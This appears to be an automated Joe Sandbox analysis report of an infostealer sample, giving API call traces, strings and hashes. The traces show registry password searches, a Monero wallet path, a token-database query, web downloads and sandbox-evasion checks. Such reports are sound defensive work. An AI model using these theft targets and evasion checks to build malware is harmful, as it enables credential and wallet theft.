Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2774356765-3474575989
Opcode ID: cd410b4cb938cd4d715550d8d0ec51a6e4a970e9d775f48296c087b1762e6039
Instruction ID: 54cada166d4c4752e392c5c665c0f7691b0a7ee24e7bf4bf1657314be350d45e
Opcode Fuzzy Hash: cd410b4cb938cd4d715550d8d0ec51a6e4a970e9d775f48296c087b1762e6039
Instruction Fuzzy Hash: D12160B1E54218ABDB00DFD5CC49FAFB7B8FB44B04F104619F605BB280D77859118BA9

Function 002572D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0025733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 002573B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0025740D
GetProcessHeap.KERNEL32(00000000,?), ref: 00257452
HeapFree.KERNEL32(00000000), ref: 00257459
task.LIBCPMTD ref: 00257555

Strings

Password, xrefs: 00257401

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetask
String ID: Password
API String ID: 775622407-3434357891
Opcode ID: 361f2b040bac7bfb9956903f1d7a55fb643b00747bb05b83471f6d19c6a39e2a
Instruction ID: 50a4bcad92047bff0579c22fc3f1531199bfee87d5edf8ae85af7cf3718925c1
Opcode Fuzzy Hash: 361f2b040bac7bfb9956903f1d7a55fb643b00747bb05b83471f6d19c6a39e2a
Instruction Fuzzy Hash: 26616DB58601189BDB24DF50DC45BDAB7B8BF44301F0081E9EA89A6141EFB05FD9CFA5

Function 0025BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

lstrlen.KERNEL32(00000000), ref: 0025BC9F

Part of subcall function 00268E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00268E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0025BCCD
lstrlen.KERNEL32(00000000), ref: 0025BDA5
lstrlen.KERNEL32(00000000), ref: 0025BDB9

Strings

AccountId, xrefs: 0025BCC4
SELECT service, encrypted_token FROM token_service, xrefs: 0025BBEB
AccountTokens, xrefs: 0025BB49
AccountTokens, xrefs: 0025BABA

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: 1a528200b2ef01eb368adf547529abe1b51c2924d16bf368de59e01e06f6078a
Instruction ID: a4b4745114ce00e20a782d9866d58a96b2ed868019fe4c84d16e9757813a6cb4
Opcode Fuzzy Hash: 1a528200b2ef01eb368adf547529abe1b51c2924d16bf368de59e01e06f6078a
Instruction Fuzzy Hash: E2B11C729201089BDB04FBA4DD96EEE7338AF54300F504169F506B7191EF346EA9CFA6

Function 00254FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00254FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00254FD1
InternetOpenA.WININET(00270DDF,00000000,00000000,00000000,00000000), ref: 00254FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00255011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00255041
InternetCloseHandle.WININET(?), ref: 002550B9
InternetCloseHandle.WININET(?), ref: 002550C6

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: ac1e8faead2e25c514b00b0af09465d6fd15413e5131e349b9c2a7ffa97ac3b4
Instruction ID: 8aaeec91efd2dd633564d97d1abb2ebab9dd6d5344316d1ffd25630878e0cd33
Opcode Fuzzy Hash: ac1e8faead2e25c514b00b0af09465d6fd15413e5131e349b9c2a7ffa97ac3b4
Instruction Fuzzy Hash: CC31F9B4A10218ABDB20DF94DC85BDDB7B4EB48704F1081E9FA09A7281D7706ED58F9D

Function 002683DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00268426
wsprintfA.USER32 ref: 00268459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0026847B
RegCloseKey.ADVAPI32(00000000), ref: 0026848C
RegCloseKey.ADVAPI32(00000000), ref: 00268499

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

RegQueryValueExA.KERNEL32(00000000,00D4E1D0,00000000,000F003F,?,00000400), ref: 002684EC
lstrlen.KERNEL32(?), ref: 00268501
RegQueryValueExA.KERNEL32(00000000,00D4E380,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00270B34), ref: 00268599
RegCloseKey.KERNEL32(00000000), ref: 00268608
RegCloseKey.ADVAPI32(00000000), ref: 0026861A

Strings

%s\%s, xrefs: 0026844D

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 00178c18bb0b15b5528fab470fee2cc2a00c4766aeefbc854a862ac85dff28da
Instruction ID: 3531f48759100f1f77748aceab74e690c5e350d55f11839a76652cea976fd668
Opcode Fuzzy Hash: 00178c18bb0b15b5528fab470fee2cc2a00c4766aeefbc854a862ac85dff28da
Instruction Fuzzy Hash: 9021D671910228ABDB24DF54DC85FE9B3B8FB48704F00C5A9A609A6140DE71AA95CFE4

Function 00267690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 002676A4
RtlAllocateHeap.NTDLL(00000000), ref: 002676AB
RegOpenKeyExA.KERNEL32(80000002,00D3C3C8,00000000,00020119,00000000), ref: 002676DD
RegQueryValueExA.KERNEL32(00000000,00D4E260,00000000,00000000,?,000000FF), ref: 002676FE
RegCloseKey.ADVAPI32(00000000), ref: 00267708

Strings

Windows 11, xrefs: 002676BD

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 80bb3c9794bfbf1da75862f709f263bf0229c1bf9ce28cdfe4801e94697ce316
Instruction ID: b8bc944f7da419d3afca1e41a2b58df38d51f82fe3551aaa6aee05d44dc975bf
Opcode Fuzzy Hash: 80bb3c9794bfbf1da75862f709f263bf0229c1bf9ce28cdfe4801e94697ce316
Instruction Fuzzy Hash: E20162B5A14204FFDB00EBE4ED4AF6DB7BCEB58705F1040B5FA04D7290E67099648B95

Function 00267720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00267734
RtlAllocateHeap.NTDLL(00000000), ref: 0026773B
RegOpenKeyExA.KERNEL32(80000002,00D3C3C8,00000000,00020119,002676B9), ref: 0026775B
RegQueryValueExA.KERNEL32(002676B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0026777A
RegCloseKey.ADVAPI32(002676B9), ref: 00267784

Strings

CurrentBuildNumber, xrefs: 00267771

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: f064d3eaadd83b8fa9c1fc818f97fa1ae223b078b4f236041c811eed42097718
Instruction ID: 1c9f1f8e1bccb52b608a2c69ec8169688460356b3b5c7ea18442de9c92166827
Opcode Fuzzy Hash: f064d3eaadd83b8fa9c1fc818f97fa1ae223b078b4f236041c811eed42097718
Instruction Fuzzy Hash: 970144B5A50308BBD700DBE0DC4AFAEB7B8EB54704F0041A5FA05A7281D67095548B95

Function 002669F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00269860: GetProcAddress.KERNEL32(74DD0000,00D423C8), ref: 002698A1
Part of subcall function 00269860: GetProcAddress.KERNEL32(74DD0000,00D42350), ref: 002698BA
Part of subcall function 00269860: GetProcAddress.KERNEL32(74DD0000,00D42368), ref: 002698D2
Part of subcall function 00269860: GetProcAddress.KERNEL32(74DD0000,00D42218), ref: 002698EA
Part of subcall function 00269860: GetProcAddress.KERNEL32(74DD0000,00D42380), ref: 00269903
Part of subcall function 00269860: GetProcAddress.KERNEL32(74DD0000,00D49138), ref: 0026991B
Part of subcall function 00269860: GetProcAddress.KERNEL32(74DD0000,00D35A90), ref: 00269933
Part of subcall function 00269860: GetProcAddress.KERNEL32(74DD0000,00D358D0), ref: 0026994C
Part of subcall function 00269860: GetProcAddress.KERNEL32(74DD0000,00D423E0), ref: 00269964
Part of subcall function 00269860: GetProcAddress.KERNEL32(74DD0000,00D423F8), ref: 0026997C
Part of subcall function 00269860: GetProcAddress.KERNEL32(74DD0000,00D424D0), ref: 00269995
Part of subcall function 00269860: GetProcAddress.KERNEL32(74DD0000,00D42230), ref: 002699AD
Part of subcall function 00269860: GetProcAddress.KERNEL32(74DD0000,00D35730), ref: 002699C5
Part of subcall function 00269860: GetProcAddress.KERNEL32(74DD0000,00D42290), ref: 002699DE

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 002511D0: ExitProcess.KERNEL32 ref: 00251211

Part of subcall function 00251160: GetSystemInfo.KERNEL32(?), ref: 0025116A
Part of subcall function 00251160: ExitProcess.KERNEL32 ref: 0025117E

Part of subcall function 00251110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0025112B
Part of subcall function 00251110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00251132
Part of subcall function 00251110: ExitProcess.KERNEL32 ref: 00251143

Part of subcall function 00251220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0025123E
Part of subcall function 00251220: __aulldiv.LIBCMT ref: 00251258
Part of subcall function 00251220: __aulldiv.LIBCMT ref: 00251266
Part of subcall function 00251220: ExitProcess.KERNEL32 ref: 00251294

